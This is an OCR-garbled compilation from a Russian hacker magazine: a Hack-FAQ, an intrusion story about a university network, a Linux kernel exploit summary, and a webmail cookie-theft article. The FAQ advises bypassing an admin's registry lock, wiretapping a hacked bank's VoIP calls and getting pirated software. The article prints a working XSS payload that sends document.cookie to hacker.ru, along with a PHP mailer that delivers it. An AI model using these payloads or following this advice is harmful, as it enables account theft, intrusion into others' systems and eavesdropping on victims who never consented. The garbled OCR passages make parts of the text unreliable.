книги хакеры / журнал хакер / 064_Optimized

ÍACK-FAQ

Задавая вопросы, конкретизируй их. Давай больше данных о системе, описывай абсолютно все, что ты знаешь о ней. Это мне поможет ответить на твои вопросы и указать твои ошибки. И не стоит задавать вопросов, вроде "Как сломать wwwсервер?" или вообще просить у меня "халявного" Internet'а. Я все равно не дам, я жадный :).

Q : Мне админ кровь портит, сейчас вот запретил редактировать реестр с моего аккаунта. Как это поправить?

À : Самым популярным способом запрета редактирования реестра является прикрытие доступа к regedit.exe. В этом случае ничто не мешает пользоваться внешним инструментом - например, RegEditX (www.dcsoft.com). Софтина давненько не обновлялась, однако обладает множеством функций и отлично справляется со своей задачей. Но есть и другое решение - можно

просто выполнить reg-файл со следующим содержанием: REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\S ystem ] "DisableRegistryTools"=dword:0

Это внесет в настройки системы требуемые изменения, и все будет ok.

Q : Организация, в которой я работаю, купила лицензионный Windows, представляешь! Все замечательно, но скоро надо переустанавливать систему, а мы все бумажки при попойке потеряли :(. Как бы мне выцепить из установленной системы серийник?

À : За профилактикой и разъяснительными беседами о злоупотреблении спиртными напитками - в районный вытрезвитель. Для поиска же ключа можно обратиться в недра Windows и отыскать нужное. Однако нам, парням занятым, некогда колупаться - за пивком не поспеем! Специально для нас зарелизили софтину Magic Jelly Bean Key Finder (www.magicaljellybean.com/keyfinder.shtml), которая, не таясь, покажет ключи установленной винды и офиса. Для любителей более основательного ПО есть кое-что погорячее - AIDA32 (www.aida32.hu/aida32-download.php). Это целый комплекс для исследования системы и окружающей сети - покажет все и вся, не

исключая и искомых SN.

Q : Мы сканим инет Retina'ой. Только вот версия уже, похоже, устарела… Какую самую свежую успели украсть варезники?

À : Какая версия лежит в приватных архивах - никому не известно, это может быть даже нечто, находящееся в глубокой разработке, то, что свет увидит еще не скоро. В публичных же архивах самая свежая - Retina

4.9.0. Весит всего 17 мег и добывается с IRC-ботов, инфу о которых можно запеленговать на xdccspy.com.

Q : Правда ли, что новый Service Pack 2 для XP будет включать собственный антивирус и мощный firewall?

À : Эту тему первым стал раскручивать журнал Internet News (http://internet- news.com/dev-news/article.php/3317211). Действительно, ходили слухи о том, что второй сервис-пак будет включать в себя полноценный антивирус. Потом

автор статьи исправился - будет лишь весомый апдейт Microsoft Security Center, отвечающий за контроль запуска несовместимого софта, потенциально несущего вред системе. На самом деле, отказ от выпуска полновесного AV - скорее правильный шаг, т.к. многие активно опасались конфликтов в работе уже существующего антивирусного софта (Norton или AVP, к примеру) с новой добавкой от MS. Также этот шаг мог быть неправильно понят юридическим сообществом, породив новую волну обвинений Microsoft в монополизации софтверного рынка. Новый Firewall будет крут разве что иконками, поскольку будет работать на прежнем движке - Internet Connection Firewall (ICF). Нужно отметить, что SP-2 практически не требует дополнительного пространства на харде, он просто подчистит старое хозяйство, заменив его новым.

Q : Восьмого марта я заметил кучу запросов на 1025 порт. Это что, гости мою девушку поздравлять ломились? :)

À : Меня часто мучают отрыжкой вопросов "чего там на таком-то порту висит?". На все ответ один - RTFM! RFC, если быть точнее. Этот слу- чай - исключительный, даже мне, гуру глупых ответов на глупые вопросы,

пришлось активно чесать кучерявую головушку, смотреть пакеты, приходящие на 1025 порт моей системы. Итак, включаем PortPeeker, маленький снифер под Windows (www.linklogger.com/portpeeker.htm). Кто стучится в дверь ко мне с толстой сумкой на ремне? Правильно, червь Nachi.F! Название взято у японского крейсера Nachi. Эпидемия как раз пришлась на Международный женский день, так что не стоит питать иллюзии о желанности твоей спутницы ;). Зараза перебирает еще несколько портов - 6129, 3127 и 2745, пытаясь занять место другого червяка - Agobot.3fk. Такая вот экспроприация экспроприаторов! Всем прописано скорейшее обновление системы, файрвола и антивирусника.

Q : Я взломал один из Cisco-роутеров банковской сети, который, помимо прочего, роутит пакеты IP-телефонии. По всему видно, что банкиры постоянно куда-то звонят. Можно ли прослушать эту линию?

À : Считай, что твои олигархи уже под колпаком и с минуты на минуту скажут номера своих черных AmEx'ов, пароли к счетам в UBS-банке и телефоны своих знакомых из модельных агентств! Нужно лишь слить утилиту Vomit ("тошнота" по-басурмански) с vomit.xtdnet.nl. Эта тулза умеет конвертировать логи tcpdump в обыкновенные wav'ы. Для полноценной работы

Vomit'a тебе придется установить в систему libdnet.

Q : Много вишу на IRC, помогаю в #help разным буржуям. Они хотят отблагодарить, про какой-то ВИЧ-лист втирают… может, по зубам им дать?

À : Если всем им надавать по зубам, не останется клиентов у XXX-инду- стрии, а наши соотечественники останутся без хлеба… Тебя, очевидно, лишь пытались отблагодарить, оплатив нечто из твоего wish list'a (листа

желаний). Это распространенная практика в кругах компьютерного андеграунда, по вишлисту можно выбрать подарок, цена которого будет соответствовать твоей щедрости и объему полученной помощи. Наиболее популярны листы на amazon.com è buy.com. Создать подобный лист может любой зарегистрированный юзер. Туда забивается адрес получателя, который остается неведом спонсору даже после оплаты запрошенного тобой подарка.

Q : Каржу ноутбуки потихоньку… Для отмазы, чтоб не посадили за тунеядство, устроился преподом информатики в школу. А эти упыри ничего не хотят делать, в контру рубятся на уроке! Заколебался их Radmin'ом мониторить, может, есть какая-то админилка для централизованного контроля класса?

À : Специально для школьных каторжан вышла NetOp School (www.crossteccorp.com/netopschool), которая позволяет мониторить сразу кучу ученических десктопов и просто так не удаляется из автозагрузки. Когда же будет мир

во всем мире, и юзеры перестанут пинать ботву, можно подключить софт и к непосредственному процессу обучения - например, показывать ученикам, как обращаться с теми или иными программами и средствами разработки. Из софта посерьезнее мог бы посоветовать сходить на www.dameware.com, там лежит профессиональный NT-софт для группового контроля.

Q : У меня есть шелл-доступ к серверу, на котором стоит прокси, открытый только для компьютеров из локальной подсети. Пользоваться я им не могу, а очень хочется, что делать?

À : Если хочется покачать файлы или полазить по инету через тот сервер, сделать это проще всего, запустив консольный браузер (lynx, wlinks, links). Но это самый наивный путь, лучше, конечно, реализовать работу с полноценным http-proxy при помощи так называемого туннелинга. На локальном хосте устанавливается софтина, работающая как прокси-сервер - она открывает некоторый порт, выдирает из заголовков всех входящих соединений УРЛы требуемых документов, подключается по SSH на удаленную машину, заставляет ту скачать требуемый документ и после

обработки этого потока возвращает содержимое файла пользователю. Происходит "инкапсуляция" 127.0.0.1:6666 ->>> 66.66.66.66:3128, 6666 - порт локального проксика, 3128 - удаленного на сервере с имеющимся шеллом. В настройках браузера прописываем теперь 127.0.0.1:6666. Из софта, реализующего туннелинг под виндой, вспоминается SecureCRT от Vandyke.com. Где найти для него кряк, ты, думаю, знаешь.

Q : Чего за bogon-адреса такие? Зачем мне советуют настроить фильтровку приходящих оттуда пакетов?..

À : Bogons получается от bogus - барабашка. Это бесхозные диапазоны IP, которые не были занесены в системы IANA и RIPE'a под ответственность конкретных провайдеров. Официально эти блоки прописаны для частного и специального использования. По идее, весомая часть существующих bogons'ов не должны роутиться с инетом, находясь в пользовании закрытой от внешнего мира сети. Однако отдельные блоки выбиваются в Сеть, обычно для осуществления DDoS-атак, рассылки спама и запуска веба со стремным контентом. Оригинальное предназначение бесхозного пространства более полно раскрывается в RFC 1466. Злостными пакетами с bogons'ов формируется до 60% распределенных "атак на интернет". Так что фильтрация богусов - не совет, а даже приказ! Существуют динамические публичные базы, куда вносятся новые зловредные пространства, откуда не должны вырываться пакеты в открытую сеть. Для пополнения ручками подойдет одна из многочисленных баз, вроде www.completewhois.com/bogons. Для тотальной же автоматизации процесса подойдет www.cymru.com/Bogons. Это экспериментальная база, которая позволяет на лету освежать список bogon- s'ов. Можно заставить роутер регулярно обращаться туда за свежими до-

бавками.

Q : Знакомая из американского чата предлагает заняться сексом при помощи веб-камеры! Говорит, что MSN какой-то нужен... я парень скромный, не пойму, в чем дело. Что за МНС такой?

À : В компьютерном подземелье MSN ассоциировался с сетью MS (gn.microsoft), через которую мутился в свое время бесплатный инет. В твоем же случае имеется в виду IM (instant messenger) - интернет-пейджер от MS, который идет в дефолтной поставке XP. В несложных настройках пейджера имеется возможность подключения web-камеры. Ты только осто-

рожнее, а то еще чего доброго продадут твою съемку порномагнатам… :)

Master-lame-master

ИНСТИТУТСКИЕ ЗАБАВЫ

Составляем бэкдор

ОСТОРОЖНО! WEB-СЕРВЕР!

По-видимому, шлюз выполнял еще и второстепенную роль файлового сервера, потому что на нем было множество папок со всяким хламом. Бегло просмотрев их, хакер не нашел ничего интересного. Для него было важно найти какую-либо ценную инфу, которая помогла бы ему продвинуться дальше. Зайдя

âдомашний каталог рута, хакер открыл .history в надежде на то, что среди командных параметров найдутся заветные пароли. Однако он ошибся - история была вполне безобидной и чистой. Ничего не оставалось, как приступить к детальному сканированию локальной сети, но хакер решил прошвырнуться по каталогу /home/stuff - папкам преподавательского состава. Опыт показывал, что обычно преподы хранят важную информацию

âсвоих домашних директориях. Это связано с их забывчивостью: человек не может помнить все пароли, поэтому нередко скидывает их в отдельный файл. Так и получилось: в каталоге /home/stuff/geor хакер нашел конфиг ftp_login. В нем находились заветный логин и пароль на FTP-сервер. Как выяснилось, на той же машине крутился и www-демон. Баннер ftpd не сулил ничего хорошего - сервис был собран под платформу IRIX. Примеча- тельно, что извне на FTP не пускали, как и на все порты, кроме 80. Это было связано с устаревшей системой, которую наверняка никому не хотелось обновлять, но хакеру это было лишь на руку. Нащупав рабочий telnetd, наш герой опробовал учетную запись на 23 порту. Шелл был хорошим (/bin/sh), поэтому login принял этот аккаунт.

Внутренности скомпиленного бинарника

ИРИСКА ЗА ВЗЛОМ

Следующее действие, которое надо было осуществить - взлом ириски (или IRIX). Система была очень старой, поэтому имелась вероятность существования публичного эксплойта для операционки, он был довольно быстро найден и носил имя xnetprint.c. Хитрым переполнением буфера взломщик получил рута через суидный бинарник /usr/lib/print/netprint. Правда, изна- чально хакер боялся, что на такой убогой

Как показывает практика, защищенность в локальных сетях университетов очень низкая. Что и подтверждает этот взлом

Не стоит забывать, что все действия хакера противозаконны, поэтому статья предназначена лишь для ознакомления и организации правильной защиты с твоей стороны. За применение материала в незаконных целях автор и редакция ответственности не несут.

Несмотря на закрытие пакетшторма, ты можешь найти необходимые эксплойты на security.nnov.ru и securitylab.ru. И, конечно же, на xakep.ru.

ß надеюсь, что читатели полюбили эту познавательную рубрику. Поэтому позволь задать тебе вопрос, который покажет, насколько хорошо ты усвоил материал :). Самый правильный

ответ будет опубликован в следующем номера Хакера.

Итак, через два месяца хакер лишился доступа к роутеру. Это произошло по причине его невнимательности. Наш герой забыл сделать элементарную вещь, в результате чего был замечен админом. После этого пользователь daemon исчез из системы, а telnetd оперативно проапдейтили. Почему это произошло, и что забыл сделать хакер? Твои ответы жду на мыло inc@sonet.to.

Администраторы, обслуживающие машины в вузе, были явно некомпетентны.

Пароли в каталоге персонала

MREMAP MISSING DO_MUNMAP

RETURN CHECK KERNEL EXPLOIT

ОПИСАНИЕ:

Если ты регулярно читаешь багтраки, то должен знать об уязвимости в функции ядра Linux do_mremap(). Эксплойт, поражающий новые версии ядра, стал неактуален после того, как программисты запатчили дыру в функции. Но спустя некоторое время багоискатели обнаружили схожую дырочку в коде do_munmap(). Эксплойт появился недавно и способен атаковать все известные ядра веток 2.2, 2.4 и 2.6. Достаточно лишь собрать статический бинарник (флаг –static), а затем указать в качестве стартовых параметров suid’ный файл и путь к рабочему интерпретатору.

ЗАЩИТА:

Защититься от напасти можно путем накладывания специального патча, доступного для скачивания на security-сайтах, и, конечно же, на www.kernel.org.

ССЫЛКИ:

Забирай эксплойт с нашего сайта: www1.xakep.ru/post/21286/exploit.txt. Мануал об уязвимости и методах наложения патчей находится здесь: security.nnov.ru/search/document.asp?docid=5593.

ЗЛОКЛЮЧЕНИЕ:

Благодаря невнимательности программистов, мы имеем уязвимость, которую можно было закрыть в свежих релизах ядра. Утешает лишь то, что уязвимость локальная: далеко не каждый взломщик способен получить хоть какой-то доступ к нужному серверу. Поэтому если ты не хочешь патчить свое ядро, то хотя бы удостоверься в надежности настроек файрвола.

GREETS:

Благодарим за написание чудесного эксплойта ребят из iSEC Security Research. Побольше бы таких хороших багоискателей ;).

Ковыряем бажное ядро

ХАКЕРЫ ЛОМАЮТ

ЯЩИКИ NM.RU

NSD (www.nsd.ru)

Все приемы, описанные в этой статье, служат лишь для ознакомления. Редакция напоминает, что применение этих методов на практике противозаконно и уголовно наказуемо.

×тобы не вводить пароль каждый раз при входе в веб-ин- терфейс почтового ящика, многие юзеры ставят галоч- ку «сохранить пароль». Пос-

ле этого у них в папке cookies появляется новая плюш-INTROДАКШН

ка, которая содержит либо комбинацию login+pass, либо идентификатор сессии. Благодаря этой информации почтовый сервер узнает в браузере пользователя законного владельца mailbox’а. В итоге, при каждом заходе на личную страницу с письмами, почтовый скрипт проверяет корректность информации, находящейся в cookie, в результате чего пользователь, не вводя пароля, сразу попадает в свой почтовый ящик. Это играет на руку хакеру. Ведь если ему удастся украсть этот кукис, он получит находящийся в нем пароль от ящика. Как известно, данные, хранящиеся в кукисах, доступны лишь тому хосту, которым они были записаны. Прочитать их можно как на стороне сервера (написав простейшее приложение на PHP, Perl или Cpp), так и у клиента - при помощи нехитрого сценария на JavaScript. Таким образом, для реализации CSS-атаки взломщику необходимо внедрить яваскрипт-код на любую страницу ломаемого сервиса и заставить жертву зайти на нее. В результате вредоносный код выполнится на клиентской машине, получит секретную информацию и сообщит ее удаленному PHP-скрипту. Каким же образом злоумышленник может вставить свой JavaScript на сайт HotBox или NewMail? Все

проще, чем ты думаешь. Поскольку создатели обоих сайтов даже и не думают отфильтровывать сценарии в теле входящих писем, хакер может просто послать письмо в htmlформате, которое содержит вредоносный JavaScript. Сразу после того как пользователь прочтет это письмо, секретные данные отправятся взломщику. Дальше - дело техники.

ГОТОВИМ ИНСТРУМЕНТ

Для реализации атаки хакеру потребуется создать две очень схожие программки на PHP. Первая посылает пользователю HTMLписьмо с вредоносным кодом, вторая отправляет взломщику украденные данные из пользовательских кукисов. Поскольку программы почти не отличаются и состоят из одной только функции MAIL(), работа с которой не раз обсуждалась на страницах Кодинга, тебе не составит труда разобраться, как работают эти приложения:

PHP-cкрипт для отправки почты

<?

$from = "hacker@hacker.ru"; // îò êîãî

$email = "lamer@hotbox.ru"; // куда отправить $topic = "hi, lamer"; // тема письма

$message = "<HTML><сюда хакер вставит троянский javascript></HTML>";

/* тело вредоносного письма. Чтобы получить скрипт, отправляющий украденные данные хакеру, замени эту строку на $message = $QUERY_STRING; */

// собираем письмо

$headers = "From: ".$from."\r\nReply-To: ".$from."\r\n"; $headers .= "MIME-Version: 1.0\r\n";

$headers .= "Content-Type: text/html;"; $body .= $message."\r\n\r\n";

mail ($email, $topic, $body, $headers); // отправляем ?>

Рассмотрим теперь пример термоядерного яваскрипта, который хакер может вставить в письмо. Цель этого нехитрого приложения – украсть содержимое куки и передать его сценарию, который отправит украденные сведения хакеру. Эту задачу скрипт реализует следующим образом. Он открывает новое pop-up окно размером 5х5 вне видимой зоны экрана, в котором загружается URL, состоящий из адреса PHP-скрипта

и самого печенья. В общем-то, это вполне можно написать в одну строчку:

JavaScript крадет печенье

<font color="red" style=background-image:url(javascript:win- dow.open('http://hacker.ru/cookie_send.php?'+document.cookie,'hacker_window','location,width=5,height=5,top=9999,left=999 9,scrollbar=0')) size=5>(СSS-атака рулит)</font>

ОСТУЖАЕМ ГОРЯЧЕЕ МЫЛО

Ну а сейчас пришло время протестировать это творчество на эффективность. Создаем для проверки на hotbox'e мыло b00b1ik_loh@pochta.ru с паролем ‘PoluPacan’. Далее посылаем на него письмо, в конец которого вставляем вышеуказанный JavaScript (только нужно не забыть поменять адрес сервера ‘hacker.ru’ на имя нашего серванта). Итак, письмо ушло. В соз-